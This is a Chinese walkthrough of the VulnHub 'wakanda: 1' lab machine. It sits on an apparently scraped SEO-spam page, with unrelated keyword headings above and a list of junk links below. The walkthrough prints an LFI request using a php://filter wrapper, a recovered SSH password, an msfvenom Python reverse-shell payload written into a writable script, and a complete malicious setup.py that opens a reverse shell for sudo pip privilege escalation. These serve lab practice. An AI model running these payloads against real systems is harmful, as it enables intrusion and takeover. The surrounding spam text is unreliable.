当前位置: 首页 > news >正文

网站视频下载到手机怎么做网站推广方法

网站视频下载到手机怎么做,网站推广方法,信誉好的专业网站建设,cms做淘宝客网站vulnhub:wakanda: 1 ~ VulnHub 导入靶机,放在kali同网段,扫描 靶机在192.168.81.5,扫描端口 四个端口,详细扫描一下 似乎没什么值得注意的,先看网站 就这一个页面,点按钮也没反应,扫…

vulnhub:wakanda: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240926152759728

靶机在192.168.81.5,扫描端口

image-20240926152947463

四个端口,详细扫描一下

image-20240926153236988

似乎没什么值得注意的,先看网站

image-20240926153416976

就这一个页面,点按钮也没反应,扫目录

image-20240926153730985

虽然扫到了,但是所有页面大小都是0B,也就是没有任何内容返回

回去再查看一下页面,发现有这么一行注释

image-20240926153856542

加上注释里的参数后,页面变成了法语

image-20240926153944034

尝试这个功能点是否存在文件包含

php://filter/convert.base64-encode/resource=index

image-20240926154501646

返回了一些东西,使用curl完整的拿下来

curl http://192.168.81.5/?lang=php://filter/convert.base64-encode/resource=index

image-20240926154603834

Base64解码

image-20240926154649321

找到一个密码

Niamey4Ever227!!!

网站底下写着站长mamadou,猜测是他的密码,尝试连接,之间扫描到ssh端口为3333

image-20240926154831767

连接成功后出来的不是shell而是Python命令行,需要用Python生成交互式shell

image-20240926155123997

找到第一个flag

image-20240926155308160

在tmp文件夹下找到文件test,里面什么都没有,但是这个文件属于devops

查找devops的文件

find / -user devops 2>/dev/null

image-20240926155508478

找到一个py文件,查看

image-20240926155553466

看起来这个文件在不停的执行命令,并且我们有写入权限,写个木马进去

msfvenom -p cmd/unix/reverse_python lhost=192.168.81.4 lport=6789 R

image-20240926155745062

python -c "exec(import('zlib').decompress(import('base64').b64decode(import('codecs').getencoder('utf-8')('eNqVkMEKgzAMhl+l9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLK+f14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII')[0])))"

我们只需要写入双引号里的东西

echo "exec(import('zlib').decompress(import('base64').b64decode(import('codecs').getencoder('utf-8')('eNqVkMEKgzAMhl+l9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLK+f14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII')[0])))" > .antivirus.py

image-20240926155918671

监听,稍作等待(大概需要几分钟)

image-20240926160235090

现在获取到了devops的shell,之前搜索文件时看到他的家目录有第二个flag

image-20240926160326605

sudo -l显示我们可以无密码执行pip,查看漏洞网站利用方式

image-20240926160451944

找到一个exp

from setuptools import setup
from setuptools.command.install import install
import base64
import osclass CustomInstall(install):def run(self):install.run(self)RHOST = '192.168.81.4' reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 9876; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOSTencoded = base64.b64encode(reverse_shell)os.system('echo %s|base64 -d|bash' % encoded)setup(name='FakePip',version='0.0.1',description='This will exploit a sudoer able to /usr/bin/pip install *',url='https://github.com/0x00-0x00/fakepip',author='zc00l',author_email='andre.marques@esecurity.com.br',license='MIT',zip_safe=False,cmdclass={'install': CustomInstall})

使用时记得改成kali的IP

在kali创建文件后,开启Python的HTTP服务,在靶机下载文件

image-20240926161752205

靶机运行

sudo /usr/bin/pip install . --upgrade --force-reinstall

kali监听

image-20240926161900948

提权完成,最后的flag在root目录

http://www.ds6.com.cn/news/122673.html

相关文章:

  • 网页大全长沙seo外包
  • 长春网站推广网诚传媒婚恋网站排名前10
  • 淘宝网站是哪个公司做的网络优化的基本方法
  • iis做网站上传速度慢seo查询在线
  • 网站建设费用分几年摊销开鲁网站seo转接
  • 佛山关键词排名方案济南网站自然优化
  • 龙岗网站制作资讯seo门户
  • 技术网站的费用怎么做会计分录软文发稿网站
  • 百度网站公司信息推广怎么做百度高级搜索技巧
  • 网页设计公司哪家效果好宝鸡百度seo
  • 商城网站都有哪 些功能什么叫外链
  • 网站空间邮箱商旅100网页版
  • 百度网站管理网页制作费用大概多少
  • 做网站浏览器职业培训机构有哪些
  • 北京做微信网站哪家好网络推广营销公司
  • 潍坊专业做网站网络平台推广广告费用
  • 拍拍网站开发关键词调词平台费用
  • 百度收录网站名字做百度推广销售怎么样
  • 52做网站网址大全是ie浏览器吗
  • 个人备案后可以做电影网站吗seo实战密码第三版
  • 高端网站设计企业网站建设防城港网站seo
  • 新手怎么建立网站指数基金是什么意思
  • 想做一个驾校的招生网站应该怎么做市场营销案例分析
  • 上海一站式政府网站建设2024年新冠疫情最新消息
  • 怎么做关于梦想的网站免费的广东网站营销seo费用
  • 吉林网站开发公司管理人员课程培训
  • 企业宣传注册哪些论坛 网站好上海搜索优化推广哪家强
  • 中文域名注册查询资源网站快速优化排名
  • 高密制作网站百度推广助手手机版
  • 做外贸现在一般都通过哪些网站哈尔滨seo网站管理